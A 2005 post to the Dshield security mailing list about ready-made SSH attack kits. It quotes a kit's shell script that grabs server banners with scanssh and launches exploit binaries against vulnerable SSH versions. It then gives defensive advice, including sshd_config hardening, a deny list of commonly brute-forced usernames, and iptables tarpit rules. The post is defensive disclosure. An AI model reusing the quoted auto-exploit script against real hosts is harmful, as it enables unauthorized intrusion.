[Dshield] SSH Scans & Premade Kits

jayjwa jayjwa at atr2.ath.cx
Sat Mar 19 03:50:14 GMT 2005


So, this is how those little SOB's have been finding SSH's to scan. Anyone 
wonder why these scans have gone thru the roof lately? It might have 
something to do with  pre-made, fully compiled downloadable attack kits. 
Apparently there's a couple of websites, one with a whole directory of 
these tools, where you can download premade kits. One is of the dnet.it 
domain and looks like it itself is hacked. One of the exploits seems to be 
called "SSHD deattack exploit. By Dvorak with Code from teso". The URL to 
Teso's site is included. You used to be able to request the root directory 
and enter the site. Not anymore; maybe they are feeling the results of 
their name being pasted on exploit used for such much illegal activity?

Here's the script to determine if your ssh is "vulnerable" from one of 
the kits, by the banner  ->

cd ssh
VER="`./scanssh $1 | awk '{print $2}'`"
a="0"

if [ "$VER" = "SSH-1.5-1.2.27" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x2 -t 1 $1
a="1"
fi

if [ "$VER" = "SSH-1.5-1.2.26" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x2 -t 1 $1
a="1"
fi

if [ "$VER" = "SSH-1.5-1.2.28" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x2 -t 1 $1
a="1"
fi

if [ "$VER" = "SSH-1.5-1.2.29" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x2 -t 1 $1
a="1"
fi

if [ "$VER" = "SSH-1.5-1.2.30" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x2 -t 1 $1
a="1"
fi

if [ "$VER" = "SSH-1.5-1.2.31" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x2 -t 1 $1
a="1"
fi

if [ "$VER" = "SSH-1.5-1.2.24" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x3 -t 1 $1
a="1"
fi

if [ "$VER" = "SSH-1.5-1.2.25" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x3 -t 1 $1
a="1"
fi

if [ "$VER" = "SSH-1.5-1.2.31a" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x3 -t 1 $1
a="1"
fi

<snip really long list>

if [ "$VER" = "SSH-1.99-OpenSSH_2.1.1" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x4/x4 -t 23 $1
a="1"
fi

if [ "$VER" = "SSH-1.5-1.3.6_F-SECURE_SSH" ]; then
echo "Vulnerable $VER found ... exploiting... "
./x4/x4 -t 24 $1
a="1"
fi

It also comes with an auto-scanner for finding ssh servers, thanks to a 
Niels Provos (scanssh). Grade A script-kiddie stuff. Interestingly enough, 
a message on his University of Mich. website says that, due the legality 
problems of his research, he's moved the stuff to the Netherlands 
(paraphased). It can even scan using SOCKS proxies, according to the web 
page. Although he suggests the tool will be used by admins to check their 
sshd versions on their own networks, I don't know many that would hide 
behide a SOCKS proxy while doing so...


I really, really hate ssh kiddies. This has reached a disgusting level 
of popularity, and ready-made attack kits don't help at all. Too many 
times my logs have been filled by some idiot, running thru name after 
name: test-test, guest-guest, dog-dog, Chris, Tom, Bob. I had a 
12-minute long one, once. Ruin their fun:

sshd_config, make some changes. I've noticed no decrease in usability 
from these settings, other than having to enter the extra Port number 
parameter,  but they increase security (if you're currently 
allowing the stuff they block):

Port (random high port)
#then use ssh -p <high port> host and sftp -o Port=<high port>
# and scp -P <high port> host when you connect)

Protocol 2
# No protocol 1. 2,1 is drop back to 1, which I've seen reported as unsafe

PermitRootLogin no
# No root, ever on Internet-accessible machines

StrictModes     yes
MaxAuthTries    3

RSAAuthentication    yes
PubkeyAuthentication yes
AuthorizedKeysFile   .ssh/authorized_keys
# Then, take your *.pub ssh keys and 'cat *.pub >> ~/.ssh/authorized_keys'
# on the host you want to login TO (mailing the admin gpg encrypted keys
# and having him do it is safe if you know him and he'll do it for you,
# is one way)
RhostsRSAAuthentication no
HostbasedAuthentication no
IgnoreRhosts            yes
PasswordAuthentication  no
# There goes bruteforcing ;)
PermitEmptyPasswords    no
PermitUserEnvironment   no

AllowUsers (specifically allow those users you want, only)
AllowGroups (same, for groups)

DenyUsers root bin daemon adm sync shutdown halt mail news uucp operator 
games lp ftp cron dcron fcron vcron smmsp mysql mysqld ssh sshd nobody 
noone guest Guest GUEST test Test TEST testing nouser user owner admin 
administrator Administrator Admin www Apache apache wwwrun wine windows 
smb smbguest samba swat cybase god dog God Chris Danny Elisabeth Jason 
rolo httpd uucp UUCP pop popd procmail sunrpc rpc
# One line. You laugh, but maybe it'll save you one day that that new 
# user you just added leaves his account open, or you forget to close off
# the "ftp" user or something trivial. Crackers count on this stuff.
# Most of these come from the attach tools themselves

DenyGroups (same thing as above, with common group names)

firewalls, iptables, add in the appropriate place, if you have this 
target- don't forget to tell your legit users you moved the port ;)

iptables -A INPUT -p tcp --dport 22 -m limit -j LOG --log-level 7 
--log-prefix "Ssh'ers again: "
iptables -A INPUT -p tcp --dport 22 -j TARPIT

Always keep your ssh up to date, http://www.openssh.org/. Version Openssh 
4.0p1 (and 4.0) was released on March 9th, 2005. Same goes for it's 
Openssl dependancy.

Use /etc/hosts.deny, hosts.allow to further limit access

Don't hesitate to report attackers or mass-scanners. I've had more than 
one attacker's account reported closed down by their ISP, after reporting 
that they were caught scanning for ssh's, some only with the logs from the 
above iptables rules. Others, I sent the whole brute force attempt from 
the syslog's.

jayjwa

  -- 
signature space still for rent



More information about the list mailing list